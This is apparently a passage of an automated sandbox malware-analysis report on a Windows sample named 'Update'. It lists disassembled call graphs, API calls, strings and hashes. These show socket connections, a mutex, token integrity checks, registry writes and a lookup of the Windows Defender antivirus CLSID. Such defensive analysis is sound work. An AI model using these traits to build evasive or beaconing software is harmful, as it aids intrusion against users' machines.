432f673 2762->2765 2763->2762 2782 4329fa7-4329fb0 call 433c660 2763->2782 2785 4329fda-4329fe5 2764->2785 2765->2785 2790 4329fcc-4329fce 2765->2790 2776 432a12b-432a13e call 432f639 2766->2776 2767->2752 2768->2752 2778 432a28d-432a2a0 call 432f639 2769->2778 2787 432a200-432a205 call 4321280 2770->2787 2788 432a190-432a197 2770->2788 2771->2761 2774 432a1e4-432a1e7 2771->2774 2774->2761 2776->2767 2799 432a125 2776->2799 2778->2768 2793 432a287 2778->2793 2792 4329fe7-4329fe9 2782->2792 2785->2792 2787->2754 2788->2787 2794 432a1f6-432a1fb call 4321280 2788->2794 2795 432a19e-432a1bd 2788->2795 2796 432a1ec-432a1f1 call 4321280 2788->2796 2790->2792 2800 432a016-432a030 GdipGetImagePalette 2792->2800 2801 4329feb-4329fed 2792->2801 2793->2778 2794->2787 2795->2770 2795->2771 2796->2794 2799->2776 2802 432a032-432a038 2800->2802 2803 432a03b-432a040 2800->2803 2806 4329fef 2801->2806 2807 432a00c-432a011 2801->2807 2802->2803 2808 432a042-432a048 2803->2808 2809 432a04a-432a050 call 432cca0 2803->2809 2810 4329ff7-432a00a call 432f639 2806->2810 2807->2752 2808->2809 2812 432a05f-432a063 2808->2812 2809->2749 2810->2807 2818 4329ff1 2810->2818 2815 432a0a0-432a0c9 call 4329d80 SetDIBColorTable call 432a320 2812->2815 2816 432a065 2812->2816 2815->2751 2819 432a068-432a098 2816->2819 2818->2810 2819->2819 2821 432a09a 2819->2821 2821->2815
                                              APIs
                                              • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 04329E7B
                                              • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 04329EFC
                                              • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 04329F24
                                              • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 04329F7F
                                              • _malloc.LIBCMT ref: 04329FC0
                                                • Part of subcall function 0432F673: __FF_MSGBANNER.LIBCMT ref: 0432F68C
                                                • Part of subcall function 0432F673: __NMSG_WRITE.LIBCMT ref: 0432F693
                                                • Part of subcall function 0432F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04334500,00000000,00000001,00000000,?,04338DE6,00000018,04346448,0000000C,04338E76), ref: 0432F6B8
                                              • _free.LIBCMT ref: 0432A000
                                              • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0432A028
                                              • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0432A0B7
                                              • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0432A112
                                              • _free.LIBCMT ref: 0432A134
                                              • _memcpy_s.LIBCMT ref: 0432A183
                                              • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0432A1D0
                                              • GdipCreateBitmapFromScan0.GDIPLUS(?,?,04345A78,00022009,?,00000000,?,00000000), ref: 0432A22C
                                              • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0432A24C
                                              • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0432A267
                                              • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0432A274
                                              • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0432A27B
                                              • _free.LIBCMT ref: 0432A296
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                              • String ID: &
                                              • API String ID: 640422297-3042966939
                                              • Opcode ID: c757035e53cac9aaa555b6d883d04d0d60ae4a6f772152d49927cd7342abd222
                                              • Instruction ID: d1a70daec0f2b983dd62b3c0bd85a27cfeeed9b7ace574f884be0ecfc9e8a578
                                              • Opcode Fuzzy Hash: c757035e53cac9aaa555b6d883d04d0d60ae4a6f772152d49927cd7342abd222
                                              • Instruction Fuzzy Hash: F3D143F1A006299FDB20DF55DD80BAAB7B8FF48304F0095A9E609A7201D774BE85CF65

                                              Control-flow Graph

                                              APIs
                                              • ResetEvent.KERNEL32(?), ref: 04322DBB
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04322DC7
                                              • timeGetTime.WINMM ref: 04322DCD
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 04322DFA
                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 04322E26
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04322E32
                                              • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 04322E51
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04322E5D
                                              • gethostbyname.WS2_32(00000000), ref: 04322E6B
                                              • htons.WS2_32(?), ref: 04322E8D
                                              • connect.WS2_32(?,?,00000010), ref: 04322EAB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                              • String ID: 0u
                                              • API String ID: 640718063-3203441087
                                              • Opcode ID: 74386bf5f15011f5eca9909d63fd8a4ad3a9b7b24977d1b9467015a76543de2b
                                              • Instruction ID: 4a3f47180aae980e5112a6bc868c1b6012db1af43f42872c295464e9a3cdd48b
                                              • Opcode Fuzzy Hash: 74386bf5f15011f5eca9909d63fd8a4ad3a9b7b24977d1b9467015a76543de2b
                                              • Instruction Fuzzy Hash: EF618BB1A40304AFE720DFA4DD45FABB7B8FF4CB10F105559F656A7280DAB4B8048B64

                                              Control-flow Graph

                                              APIs
                                              • ResetEvent.KERNEL32(?), ref: 10002D9B
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 10002DA7
                                              • timeGetTime.WINMM ref: 10002DAD
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 10002DDA
                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 10002E06
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E12
                                              • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 10002E31
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E3D
                                              • gethostbyname.WS2_32(00000000), ref: 10002E4B
                                              • htons.WS2_32(?), ref: 10002E6D
                                              • connect.WS2_32(?,?,00000010), ref: 10002E8B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                              • String ID: 0u
                                              • API String ID: 640718063-3203441087
                                              • Opcode ID: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
                                              • Instruction ID: d5696d751933d4553be470da2890fc26df070c3c16b6f4ec0f7763c80930fe30
                                              • Opcode Fuzzy Hash: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
                                              • Instruction Fuzzy Hash: 136152B1A40304BFE710DFA4CC85FAAB7B9FF49711F104629F646AB2D0D7B1A9048B64

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3205 4326a70-4326ae3 call 432eff4 GetCurrentProcessId wsprintfW call 4326910 call 4336770 GetVersionExW 3212 4326be6-4326bec 3205->3212 3213 4326ae9-4326af0 3205->3213 3214 4326c14-4326c21 wsprintfW 3212->3214 3213->3212 3215 4326af6-4326afd 3213->3215 3217 4326c24-4326c26 3214->3217 3215->3212 3216 4326b03-4326b21 GetCurrentProcess OpenProcessToken 3215->3216 3216->3212 3218 4326b27-4326b47 GetTokenInformation 3216->3218 3219 4326c31-4326c46 call 432f00a 3217->3219 3220 4326c28-4326c2e call 432fac9 3217->3220 3222 4326bbb-4326bce CloseHandle 3218->3222 3223 4326b49-4326b52 GetLastError 3218->3223 3220->3219 3226 4326bd0 3222->3226 3227 4326bf6-4326bfc 3222->3227 3223->3222 3228 4326b54-4326b6b LocalAlloc 3223->3228 3230 4326bd2-4326bd4 3226->3230 3231 4326bee-4326bf4 3226->3231 3232 4326c0e-4326c0f 3227->3232 3233 4326bfe-4326c04 3227->3233 3228->3222 3234 4326b6d-4326b8d GetTokenInformation 3228->3234 3230->3212 3235 4326bd6-4326bdc 3230->3235 3231->3214 3232->3214 3233->3217 3236 4326c06-4326c0c 3233->3236 3237 4326bae-4326bb5 LocalFree 3234->3237 3238 4326b8f-4326bac GetSidSubAuthorityCount GetSidSubAuthority 3234->3238 3235->3217 3239 4326bde-4326be4 3235->3239 3236->3214 3237->3222 3238->3237 3239->3214
                                              APIs
                                              • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 04326A94
                                              • wsprintfW.USER32 ref: 04326AA7
                                                • Part of subcall function 04326910: GetCurrentProcessId.KERNEL32(45F3111E,00000000,00000000,75BF73E0,?,00000000,043410DB,000000FF,?,04326AB3,00000000), ref: 04326938
                                                • Part of subcall function 04326910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,043410DB,000000FF,?,04326AB3,00000000), ref: 04326947
                                                • Part of subcall function 04326910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,043410DB,000000FF,?,04326AB3,00000000), ref: 04326960
                                                • Part of subcall function 04326910: CloseHandle.KERNEL32(00000000,?,00000000,043410DB,000000FF,?,04326AB3,00000000), ref: 0432696B
                                              • _memset.LIBCMT ref: 04326AC2
                                              • GetVersionExW.KERNEL32(?), ref: 04326ADB
                                              • GetCurrentProcess.KERNEL32(00000008,?), ref: 04326B12
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 04326B19
                                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04326B3F
                                              • GetLastError.KERNEL32 ref: 04326B49
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04326B5D
                                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 04326B85
                                              • GetSidSubAuthorityCount.ADVAPI32 ref: 04326B98
                                              • GetSidSubAuthority.ADVAPI32(00000000), ref: 04326BA6
                                              • LocalFree.KERNEL32(?), ref: 04326BB5
                                              • CloseHandle.KERNEL32(?), ref: 04326BC2
                                              • wsprintfW.USER32 ref: 04326C1B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                              • String ID: -N/$NO/$None/%s
                                              • API String ID: 3036438616-3095023699
                                              • Opcode ID: f631f3d0287da1a3b38cf05b061b70900cb7fb3b40b2be5b9790ad65b1c31a4e
                                              • Instruction ID: 6f299bddab06dbc3643fb02e878c6644aec43f6a32834e81b4ff6188c633ba06
                                              • Opcode Fuzzy Hash: f631f3d0287da1a3b38cf05b061b70900cb7fb3b40b2be5b9790ad65b1c31a4e
                                              • Instruction Fuzzy Hash: A0419274A00234ABDB249B619E8AFEB76BCEF4D744F006095F605A6241DA34FD90CBA1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3609 432ad10-432ad2b 3610 432ad84-432ad8f 3609->3610 3611 432ad2d-432ad5b RegOpenKeyExW 3609->3611 3614 432b845-432b84b call 432ce00 3610->3614 3615 432ad95-432ad9c 3610->3615 3612 432ad79-432ad7e 3611->3612 3613 432ad5d-432ad73 RegQueryValueExW 3611->3613 3612->3610 3617 432b84e-432b854 3612->3617 3613->3612 3614->3617 3618 432afe3-432b09b call 432f707 call 4336770 call 432eff4 call 4337660 call 432f707 call 432cf20 call 432eff4 3615->3618 3619 432adea-432adf1 3615->3619 3668 432b162-432b189 call 432fa29 CloseHandle 3618->3668 3669 432b0a1-432b0ee call 4337660 RegCreateKeyW 3618->3669 3619->3617 3622 432adf7-432ae29 call 432f707 call 4336770 3619->3622 3632 432ae42-432ae4e 3622->3632 3633 432ae2b-432ae3f wsprintfW 3622->3633 3635 432ae50 3632->3635 3636 432ae9a-432aef1 call 432eff4 call 4337660 call 4322ba0 call 432efff * 2 3632->3636 3633->3632 3637 432ae54-432ae5f 3635->3637 3640 432ae60-432ae66 3637->3640 3643 432ae86-432ae88 3640->3643 3644 432ae68-432ae6b 3640->3644 3649 432ae8b-432ae8d 3643->3649 3647 432ae82-432ae84 3644->3647 3648 432ae6d-432ae75 3644->3648 3647->3649 3648->3643 3652 432ae77-432ae80 3648->3652 3653 432aef4-432af09 3649->3653 3654 432ae8f-432ae98 3649->3654 3652->3640 3652->3647 3657 432af10-432af16 3653->3657 3654->3636 3654->3637 3661 432af36-432af38 3657->3661 3662 432af18-432af1b 3657->3662 3667 432af3b-432af3d 3661->3667 3665 432af32-432af34 3662->3665 3666 432af1d-432af25 3662->3666 3665->3667 3666->3661 3672 432af27-432af30 3666->3672 3673 432afae-432afe0 call 432fa29 CloseHandle call 432efff 3667->3673 3674 432af3f-432af41 3667->3674 3684 432b0f0-432b13f call 432eff4 call 4325a30 RegDeleteValueW RegSetValueExW 3669->3684 3685 432b14a-432b15f RegCloseKey call 432fac9 3669->3685 3672->3657 3672->3665 3678 432af43-432af4e call 432efff 3674->3678 3679 432af55-432af5c 3674->3679 3678->3679 3682 432af70-432af74 3679->3682 3683 432af5e-432af69 call 432fac9 3679->3683 3690 432af76-432af7f call 432efff 3682->3690 3691 432af85-432afa9 call 432f020 3682->3691 3683->3682 3684->3685 3705 432b141-432b147 call 432fac9 3684->3705 3685->3668 3690->3691 3691->3636 3705->3685
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0432AD53
                                              • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0432AD73
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: OpenQueryValue
                                              • String ID: %s_bin$Console$Console\0$IpDatespecial
                                              • API String ID: 4153817207-1338088003
                                              • Opcode ID: f053874c9f0d3eba8f4e19c99f508bec0cd564cab5621ed69151be23fe01246e
                                              • Instruction ID: 8f2c643241efb8c71d5c7bcb715ee6529c800364cf42d8a5bd80c21178c2028d
                                              • Opcode Fuzzy Hash: f053874c9f0d3eba8f4e19c99f508bec0cd564cab5621ed69151be23fe01246e
                                              • Instruction Fuzzy Hash: E6C1B2B1A00310ABE710EF24DD46F6B73A9FF94718F045528F949AB281E775F905CBA2

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3708 4326150-43261a5 call 4336770 call 433004b 3713 4326201-4326228 CoCreateInstance 3708->3713 3714 43261a7-43261ae 3708->3714 3715 4326422-432642f lstrlenW 3713->3715 3716 432622e-4326282 3713->3716 3717 43261b0-43261b2 call 4326050 3714->3717 3718 4326441-4326450 3715->3718 3719 4326431-432643b lstrcatW 3715->3719 3728 432640a-4326418 3716->3728 3729 4326288-43262a2 3716->3729 3721 43261b7-43261b9 3717->3721 3723 4326452-4326457 3718->3723 3724 432645a-432647a call 432f00a 3718->3724 3719->3718 3725 43261db-43261ff call 433004b 3721->3725 3726 43261bb-43261d9 lstrcatW * 2 3721->3726 3723->3724 3725->3713 3725->3717 3726->3725 3728->3715 3732 432641a-432641f 3728->3732 3729->3728 3735 43262a8-43262b4 3729->3735 3732->3715 3736 43262c0-4326363 call 4336770 wsprintfW RegOpenKeyExW 3735->3736 3739 43263e9-43263ff 3736->3739 3740 4326369-43263ba call 4336770 RegQueryValueExW 3736->3740 3743 4326402-4326404 3739->3743 3744 43263dc-43263e3 RegCloseKey 3740->3744 3745 43263bc-43263da lstrcatW * 2 3740->3745 3743->3728 3743->3736 3744->3739 3745->3744
                                              APIs
                                              • _memset.LIBCMT ref: 0432618B
                                              • lstrcatW.KERNEL32(04351F10,0434510C,?,45F3111E,00000AD4,00000000,75BF73E0), ref: 043261CD
                                              • lstrcatW.KERNEL32(04351F10,0434535C,?,45F3111E,00000AD4,00000000,75BF73E0), ref: 043261D9
                                              • CoCreateInstance.OLE32(04342480,00000000,00000017,0434578C,?,?,45F3111E,00000AD4,00000000,75BF73E0), ref: 04326220
                                              • _memset.LIBCMT ref: 043262CE
                                              • wsprintfW.USER32 ref: 04326336
                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0432635F
                                              • _memset.LIBCMT ref: 04326376
                                                • Part of subcall function 04326050: _memset.LIBCMT ref: 0432607C
                                                • Part of subcall function 04326050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04326088
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                              • API String ID: 1221949200-1583895642
                                              • Opcode ID: e59a809a143b9c44fba6b794beaa0eeeed56c0904267ad0b997b5b40de552ccb
                                              • Instruction ID: 6c4204a91bd4a85dfbd90713fada61de56c91252adef6fc5f522c0ef297a4595
                                              • Opcode Fuzzy Hash: e59a809a143b9c44fba6b794beaa0eeeed56c0904267ad0b997b5b40de552ccb
                                              • Instruction Fuzzy Hash: FC815FB1A40268ABDB20DB54CC91FEEB7B8EF88704F545189F709A7151D674BE80CF64

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3746 4325f40-4325f7b CreateMutexW GetLastError 3747 4325f9b-4325fa2 3746->3747 3748 4325f7d 3746->3748 3750 4326003-432602d GetModuleHandleW GetConsoleWindow call 432e4f0 3747->3750 3751 4325fa4-4325faa 3747->3751 3749 4325f80-4325f99 Sleep CreateMutexW GetLastError 3748->3749 3749->3747 3749->3749 3756 4326048-432604f call 432e850 3750->3756 3757 432602f-4326045 call 432f00a 3750->3757 3753 4325fb0-4325fe1 call 4336770 lstrlenW call 4326d70 3751->3753 3765 4325ff3-4326001 Sleep 3753->3765 3766 4325fe3-4325ff1 lstrcmpW 3753->3766 3765->3750 3765->3753 3766->3750 3766->3765
                                              APIs
                                              • CreateMutexW.KERNEL32(00000000,00000000,2024.11.10), ref: 04325F66
                                              • GetLastError.KERNEL32 ref: 04325F6E
                                              • Sleep.KERNEL32(000003E8), ref: 04325F85
                                              • CreateMutexW.KERNEL32(00000000,00000000,2024.11.10), ref: 04325F90
                                              • GetLastError.KERNEL32 ref: 04325F92
                                              • _memset.LIBCMT ref: 04325FB9
                                              • lstrlenW.KERNEL32(?), ref: 04325FC6
                                              • lstrcmpW.KERNEL32(?,04345328), ref: 04325FED
                                              • Sleep.KERNEL32(000003E8), ref: 04325FF8
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 04326005
                                              • GetConsoleWindow.KERNEL32 ref: 0432600F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                              • String ID: 2024.11.10$key$open
                                              • API String ID: 2922109467-3483727992
                                              • Opcode ID: bc1660df1b466f8dec1e53a6c599e033609e357f915369f87b9691be19ae6ffa
                                              • Instruction ID: 288f2e60a973181eee94569a0dbe1ac36eeaa8f83baabbbd0ab72f9d8d8d3339
                                              • Opcode Fuzzy Hash: bc1660df1b466f8dec1e53a6c599e033609e357f915369f87b9691be19ae6ffa
                                              • Instruction Fuzzy Hash: E821E476904315ABE610DBA0ED46BAA7398EFC8744F506819F604A71C0DA74FA05CBA3
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?), ref: 6C1C6BEB
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6C1C6C0D
                                              • _strlen.LIBCMT ref: 6C1C6C26
                                                • Part of subcall function 6C1B22C0: _strlen.LIBCMT ref: 6C1B230B
                                                • Part of subcall function 6C1C6707: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6C1C6745
                                                • Part of subcall function 6C1C6707: _strlen.LIBCMT ref: 6C1C6759
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00015A00,6C39DF78,00000000,00000000), ref: 6C1C70CB
                                              • CreateThread.KERNEL32(00000000,00000000,6C1C50F3,00000000,00000000,00000000), ref: 6C1C70DD
                                              • WaitForSingleObject.KERNEL32(00000000,00011170), ref: 6C1C70F3
                                              • CloseHandle.KERNEL32(00000000), ref: 6C1C7105
                                              • CreateThread.KERNEL32(00000000,00000000,6C1BF754,00000000,00000000,00000000), ref: 6C1C7250
                                                • Part of subcall function 6C1C3DE8: WSAStartup.WS2_32(00000202,?), ref: 6C1C3E03
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CreateModuleThread_strlen$FileHandleName$CloseObjectSingleStartupWait
                                              • String ID: Upda$Update.d$Update.d$dll$te.d
                                              • API String ID: 1548707355-244782202
                                              • Opcode ID: 2180d6dd3e6e07e87ebb1c3cf4ff807d06d08f30395af3a1d1ea05d80d37b0e1
                                              • Instruction ID: 0a620b5f5f068088896f820a787d976b6e3ca37ee40f09719a9966338befaa07
                                              • Opcode Fuzzy Hash: 2180d6dd3e6e07e87ebb1c3cf4ff807d06d08f30395af3a1d1ea05d80d37b0e1
                                              • Instruction Fuzzy Hash: BC0204B1E002089FDB10CF64CC947EEB7B9EF65318F154629F455E7780EB78A9488B92
                                              APIs
                                              • _memset.LIBCMT ref: 043262CE
                                              • wsprintfW.USER32 ref: 04326336
                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0432635F
                                              • _memset.LIBCMT ref: 04326376
                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 043263B2
                                              • lstrcatW.KERNEL32(04351F10,?), ref: 043263CE
                                              • lstrcatW.KERNEL32(04351F10,0434535C), ref: 043263DA
                                              • RegCloseKey.ADVAPI32(00000000), ref: 043263E3
                                              • lstrlenW.KERNEL32(04351F10,?,45F3111E,00000AD4,00000000,75BF73E0), ref: 04326427
                                              • lstrcatW.KERNEL32(04351F10,043453D4,?,45F3111E,00000AD4,00000000,75BF73E0), ref: 0432643B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                              • API String ID: 1671694837-1583895642
                                              • Opcode ID: 87438569e9aa753099b23beb07089b37f1d121506c8f9959f487606565d88427
                                              • Instruction ID: 5d1324deb9f83f5c56152a8580229c26977e041febbe84fcea4b2c96a68bd0a6
                                              • Opcode Fuzzy Hash: 87438569e9aa753099b23beb07089b37f1d121506c8f9959f487606565d88427
                                              • Instruction Fuzzy Hash: D441A4F1A002686BDB24DB90CC51FEEB7B8AF88705F0051C9F749A7191DA74AA80CF64
                                              APIs
                                              • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,04325611,0000035E,000002FA), ref: 0432749C
                                              • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 043274B2
                                              • swprintf.LIBCMT ref: 043274EF
                                                • Part of subcall function 04327410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04327523), ref: 0432743D
                                                • Part of subcall function 04327410: GetProcAddress.KERNEL32(00000000), ref: 04327444
                                                • Part of subcall function 04327410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04327523), ref: 04327452
                                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 04327547
                                              • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 04327563
                                              • RegCloseKey.KERNEL32(000002FA), ref: 04327586
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,04325611,0000035E,000002FA), ref: 04327598
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                              • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                              • API String ID: 2158625971-3190923360
                                              • Opcode ID: 91a5b7c6bbfc095591f319bba2bdc9ad3d24d29f0791232f5a1902a0bdd4ef51
                                              • Instruction ID: 529f91f42032a0aec29c21e4119fd2a84ea298b61e27eb3629cda2935ff4bb4e
                                              • Opcode Fuzzy Hash: 91a5b7c6bbfc095591f319bba2bdc9ad3d24d29f0791232f5a1902a0bdd4ef51
                                              • Instruction Fuzzy Hash: CD31B675A40219BBE714DBA4DD45FFFBBBCEF88740F141559BA06A6140EA74FA00CBA0
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000002,?,45F3111E,?,00000000,?), ref: 0432C09E
                                              • GlobalLock.KERNEL32(00000000), ref: 0432C0AA
                                              • GlobalUnlock.KERNEL32(00000000), ref: 0432C0BF
